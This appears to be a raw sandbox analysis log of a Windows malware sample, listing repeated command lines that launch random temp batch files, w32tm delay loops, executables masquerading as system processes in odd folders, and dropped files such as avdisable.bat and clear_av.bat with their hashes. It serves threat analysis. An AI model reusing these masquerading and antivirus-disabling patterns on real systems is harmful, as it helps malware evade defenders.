w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yMeEqlK1gO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kXH0MsH7jV.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\N7XO3McAFn.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uq0hdwOOBc.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uugdhbmYnk.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Dk8ljd7jBY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\v65NgynF79.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\79RMekxjZd.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZgKlNS7JdR.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\H7eFR6a9mI.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CWxqMEPA9M.bat"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QOz0umrEhM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\15yWIDpGaf.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iPSx7mMsuZ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\csrss.exe
C:\Users\Admin\csrss.exe
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe
"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zAqEIlSfAD.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"
C:\Users\Admin\csrss.exe
"C:\Users\Admin\csrss.exe"
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtKWrLEt72.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3gUlVaPHfz.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZmgdUlucqh.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ixgWq8OOYW.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\53OVnhiNRT.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wNwF62sylT.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0quqFCQQe7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ssDSZpddA3.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4stVUxPy0P.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E3sOpJujjE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GTS4B5cy6p.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\p5ITN63wlJ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wKGJ2NUoAL.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8KwMxVG80h.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OI2OM6vZgr.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\j8BV8simza.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Users\Default User\sppsvc.exe
"C:\Users\Default User\sppsvc.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\z7AIE64VZ5.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Users\Default User\sppsvc.exe
"C:\Users\Default User\sppsvc.exe"
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ounU5LkXKE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5mXdMdden9.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\x8TIUMdSeB.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NHYDEKme3A.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WLCDTNV5Zk.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\410ZzJtAuR.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DC0SKfNvdG.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yaFjl1awzE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5irhJyFUC1.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HiXkD60p2N.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\95TPLp0dsP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LBVLNHYHv1.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DXR1U0Y5m3.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ST975DOJvB.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Network
Files
memory/2444-0-0x000007FEF5723000-0x000007FEF5724000-memory.dmp
memory/2444-1-0x0000000000820000-0x0000000000A0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
| MD5 | 4eab8d478ffd36a7d96ca9a8512cc447 |
| SHA1 | cddb1b2d3656d62cdcc67125ec29f2bf83c5f346 |
| SHA256 | a2701733d9e6d3b518072810c779b25dd7ddd683fe36196e259a551acbc1e16a |
| SHA512 | c5dec11ecb61486b87d26f34e90e1107562186ed16c7d9b77d2e7b47456917f2aafc2c61b6b78472a8eeaa84a93a52192c300cf79220bbe8bcc9c080db1e36d6 |
C:\Users\Admin\AppData\Local\Temp\clear_av.bat
| MD5 | 48d1db006fe2ae378b0f7efd561d7e56 |
| SHA1 | 63df10216f0ad81d1d42dd2fc8c4483be5d077fc |
| SHA256 | 65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a |
| SHA512 | 079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5 |
C:\Users\Admin\AppData\Local\Temp\FunChecker .bat
| MD5 | 42afdea7c75bc9074a22ff1be2787959 |
| SHA1 | 24bc20691a1e99e2cf0b2bca78694701fa47720a |
| SHA256 | 3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2 |
| SHA512 | d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9 |
C:\Users\Admin\AppData\Local\Temp\avdisable.bat
| MD5 | 4c35b71d2d89c8e8eb773854085c56ea |
| SHA1 | ede16731e61348432c85ef13df4beb2be8096d9b |
| SHA256 | 3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42 |
| SHA512 | a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d |
memory/2444-35-0x000007FEF5720000-0x000007FEF610C000-memory.dmp
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe
| MD5 | 9a1c593488c39a17105a4ea268b40a0e |
| SHA1 | 90f73ef3dd6c79442f27f481957e60f0deaa3ab4 |
| SHA256 | 9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5 |
| SHA512 | a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d |
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat
| MD5 | 773bdbbe3e641a349d737adddf1223c0 |
| SHA1 | 682e313b914460eefe3e2cb7a09beeacd461c108 |
| SHA256 | 606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a |
| SHA512 | 0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4 |
\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
| MD5 | 1876c5d2f6209c7ca5db2b568ec8dc47 |
| SHA1 | 6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33 |
| SHA256 | e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755 |
| SHA512 | b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94 |
memory/1808-49-0x0000000000A40000-0x0000000000C64000-memory.dmp
memory/1808-50-0x0000000000560000-0x000000000057C000-memory.dmp
memory/1808-51-0x0000000002200000-0x0000000002216000-memory.dmp
memory/1808-52-0x000000001B000000-0x000000001B056000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CbarT2SBYT.bat
| MD5 | fd4af78910480b801198143e034c7a70 |
| SHA1 | 36ae3ca66727a9c89c89e15710de374fef842018 |
| SHA256 | 821abecbcedf393c871323128bba199ef2e3fe458ef67d92a39f3daace4811e8 |
| SHA512 | c5e567f4cd0f0bb15aa516ce83f195887a363e4b36c454b72f0a5489f7cc54fc763defac520d58a436e2bac0ec839d70d5397e4dca25a1cd077d61adca5efc04 |
memory/2448-78-0x0000000000F70000-0x0000000001194000-memory.dmp
memory/2448-79-0x0000000000B20000-0x0000000000B76000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\syYKg8QxNI.bat
| MD5 | 28cea2d0146d39f77b4fd4c4ca8a1332 |
| SHA1 | 08abdb63ca72466901c22dff844eb540746e09ac |
| SHA256 | 9cec9c990144fc6e8384d7e108528e8f282f7351ee3c059507536d95cdb75a72 |
| SHA512 | 2f4a6e94f53d396619385059dd0fdb82dec842960dc21c2688eb919dbf0038e662ff45c1562f125faba7dbdcfcc3c08208f50fce5f2339287cf059455973e0cc |
C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat
| MD5 | df4773f9129b9cf115be5e01cc974dcd |
| SHA1 | ac33c525d0fced17956293d912ba0e7a8864f689 |
| SHA256 | 127da4bddb1c1fa4c0cd3d6c3a525d86e5a629d37f5a5ac71c8f6ac4c974bb49 |
| SHA512 | e50add9bc5cf8337d7fc98ba955ae96f5f7d9dc7a41e1d2122b005ec662082328d3ef26280998bdaeead76f5152ae4a7291cd686330961bde925ca91d2354986 |
memory/2580-92-0x00000000011E0000-0x0000000001404000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat
| MD5 | 2201eaea2de2c24a9a57fb6907bc1053 |
| SHA1 | a89b5b52e86ead88113d601157190903e72354d5 |
| SHA256 | 8711488963ad1d6499a867f1cd8e596301e31c7b9a34898b9d10d7d758d1b3aa |
| SHA512 | 071a9ebd1ae7d2887679734b63ee9b26a8501c8db18b0b17ceb1a021010d519e6a5b536722b5b0ef404123d6331c94535d3a2db5f2b2c86f0e7e092560cc83d6 |
C:\Users\Admin\AppData\Local\Temp\QRlBHoY6P9.bat
| MD5 | af663d477ea3cb8e0ab6dec0a54c0468 |
| SHA1 | 79312354971800ba78c4c063592dbce4f10c9072 |
| SHA256 | fe24ea1192c85f6752b3ad9c6e928a4a4d6f4cc50f90d13d3e098d0bf7733740 |
| SHA512 | 5ba78d9b1ed3d6aeb3a316f76c4d28505b6c0077d48bfc2b3897af104bb934f55d04dc00d50593495ba3f9723572907e97425416c98966c4786dbe8404f80c8c |
C:\Users\Admin\AppData\Local\Temp\gPrDhQDX5J.bat
| MD5 | 19bc625e56cd331db53d51659096b3ac |
| SHA1 | 00ed66a0dc9dba96e53a354fc7f6a80d3bd0ad79 |
| SHA256 | bbe6fdfc3e0e18e50d86165bc7d45c8dcaa69f912342d154bae1b5495ae94b72 |
| SHA512 | 552165d9ae700e5f2e20770cf2bd3d7f1a924e34317a5680378acca900edf7e7af1a4fae27b515878560c58dba23b7ec0a8430597ef85aa7ea804262ec8bf253 |
C:\Users\Admin\AppData\Local\Temp\1F0LTC0kP2.bat
| MD5 | 52e6ae137962ea562104d320d0c91864 |
| SHA1 | 4c4375c9950a1267859e0a47cb5ee707e873ce8e |
| SHA256 | 9017c3984a3a3a45506e1f7f461ef48b10064c830b54d44a91ff66e432713d20 |
| SHA512 | aa1c34beaca5efa92c88c3c93e5ea16bfc5737f4587b026c8c90afd2792ed0bfa970f5d8b7bb5b7e6a886bce26d0576e7ea7f588d7934b926a9025aba6cdbdab |
memory/1716-117-0x00000000012B0000-0x00000000014D4000-memory.dmp
memory/1716-118-0x00000000005C0000-0x0000000000616000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\fmTXnddwCX.bat
| MD5 | 02e98cbd8a083b6029f143d2431be1b4 |
| SHA1 | 7e936c463f53746a4930ec10ba3da45feef6118e |
| SHA256 | 0bf287dadfa1b29cb77df7cc6c3228c20863fa195bdd984f5f9f656f5416f67f |
